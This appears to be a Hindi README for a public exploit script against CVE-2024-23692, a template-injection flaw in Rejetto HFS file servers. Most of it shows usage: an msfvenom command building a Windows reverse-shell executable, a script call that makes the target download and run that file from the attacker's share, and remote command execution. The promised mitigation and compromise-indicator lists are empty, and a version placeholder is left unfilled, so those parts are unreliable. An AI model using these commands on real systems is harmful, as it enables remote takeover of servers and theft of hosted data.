
Rejetto HFS (HTTP File Server) एक सरल वेब फ़ाइल सर्वर है जो नेटवर्क या इंटरनेट पर फ़ाइल साझाकरण की सुविधा प्रदान करता है।
Rejetto HFS (HTTP फ़ाइल सर्वर) एक सरल वेब फ़ाइल सर्वर है जो नेटवर्क या इंटरनेट पर फ़ाइल साझा करने की सुविधा प्रदान करता है। इसके उपयोग में आसानी और सरलता के बावजूद, एक गंभीर भेद्यता (CVE-2024-23692) खोजी गई है, जो सर्वर को हमलावरों के लिए निशाना बनाती है।
CVE-2024-23692 Rejetto HFS में पहचानी गई एक सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) भेद्यता है। यह भेद्यता एक हमलावर को सर्वर पर दुर्भावनापूर्ण टेम्पलेट इंजेक्ट करने और निष्पादित करने की अनुमति देती है। यदि इसका शोषण किया जाता है, तो यह रिमोट कोड निष्पादन का कारण बन सकता है, जिससे पूरा सर्वर और उस पर होस्ट किया गया डेटा संभावित रूप से समझौता हो सकता है।
इस भेद्यता का शोषण करने वाला हमलावर निम्न कार्य कर सकता है:
msfvenom में बनाए गए दुर्भावनापूर्ण बाइनरी का उपयोग करके एक शेल प्राप्त करें।
नोट: nc को सुनने के लिए छोड़ दें।
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
दूरस्थ रूप से एक कमांड चलाएँ।
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
परिणाम प्रदर्शित होने में लगभग 15 सेकंड लग सकते हैं।
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
Rejetto HFS के सभी संस्करण, [यहाँ सबसे नवीनतम असुरक्षित संस्करण डालें] संस्करण तक, इस भेद्यता से प्रभावित हैं।
CVE-2024-23692 से उत्पन्न जोखिम को कम करने के लिए, उपयोगकर्ताओं को निम्नलिखित सलाह दी जाती है:
यह निर्धारित करने के लिए कि आपका सर्वर समझौता किया गया है या नहीं, निम्नलिखित की तलाश करें:
आगे की सहायता और समर्थन के लिए, Rejetto HFS सामुदायिक फ़ोरम या आधिकारिक समर्थन चैनलों का संदर्भ लें।
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।